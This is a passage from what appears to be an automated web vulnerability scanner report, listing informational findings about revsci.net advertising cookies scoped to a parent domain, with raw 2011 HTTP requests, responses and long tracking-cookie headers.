Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spZQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yNA1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ymBV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UZSm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jxkC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_U-2H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MHAh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mC_w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hJ1L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a0q5=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CGuf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vcWj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UeD7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NZMh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gtXn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Gz72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I_s8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Yae=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_13QU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yd99=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kx93=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vjxv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i6y7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ci3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BIfh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hlh0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fVrw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UYkU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vq52=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p_N7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_swop=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DAhz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_36jJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EGaf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yqe4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Xkff=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PotF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6iIy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rG0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bmc9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AIz7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_owhI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YG_I=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ttgh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qIL0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zoqu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wj7v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8_Kd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HV6c=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lX7E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMvP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PMyZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qp5L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LM_E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qsf6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vgZJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vs0v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5KhS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__-hU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e4dU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tBSl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1hrT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cAs9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ufy6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zbl-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kzjM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4dwc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_7nfY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TXTA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ifOy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uXx-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SZmK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VzFl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MYGJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ePg8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2b4r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BSfF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xPU8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MM9p=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KwBW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NX3a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QdlW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HkOY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8S1T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jqXq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bM22=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cSyo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__g8N=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vWFu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sm2o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aHEk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_trlL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_S6yp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_46IH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fPgs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vtS4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q7Ad=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uQON=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1YTe=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRRI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iCxA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wveS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IoVb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XSck=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
Set-Cookie: rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:56:55 GMT
Content-Length: 730

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
udm_0=MLvv7iXuYS5npS5IdtJ9rYUnBG1JihVUWLZDwXDpfLby5LNpTzBgDsiqygfVxd+K709LxniKKr1/Jh0PZqrISRqeT7E3J/DikjgckzjZlb25WiMcZffZLOF2S/dP5ZcaSUyjrK5OU8eE/Wavz/TpePFNMR347DHYy3XTsgP5SOgfLi2GwOwvgwSwPLVp1lF3lYOUw6f71CvjHp+Rh4fhQCYkGhqAutVPhz+vTCxd0qyoBvHmxrcfZeCR+WPhx0hLfBQHIyR0lAybjT7WrbQdKQ1p21mwmYaKqD2ggWy/bPOUy7AIPoEwDd9Al3GUd/6WwYb6ifbYlDYxeMF8Gs4bgf44Lpr3AhvptLLNqAoF2xQFpyDXjMmuv9hPf2Ycb7kEPXmvqczS7iXwY+vPDiWLLcpHGbvlx38UVHa9EG7ByiyAurjCyLYLxlbjjX/DO1uknbOYlan89xrt3PsPSCciR/gs9XSoA+k3/mLyBOxjg1ZwmWwNhi5JUchRIQG3tn1ian+yYvzGpRivBsNAhhDeX+STD7boBawdVLIKsdraSo/2y0nY1qbU; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/66697159.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Ftopics%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
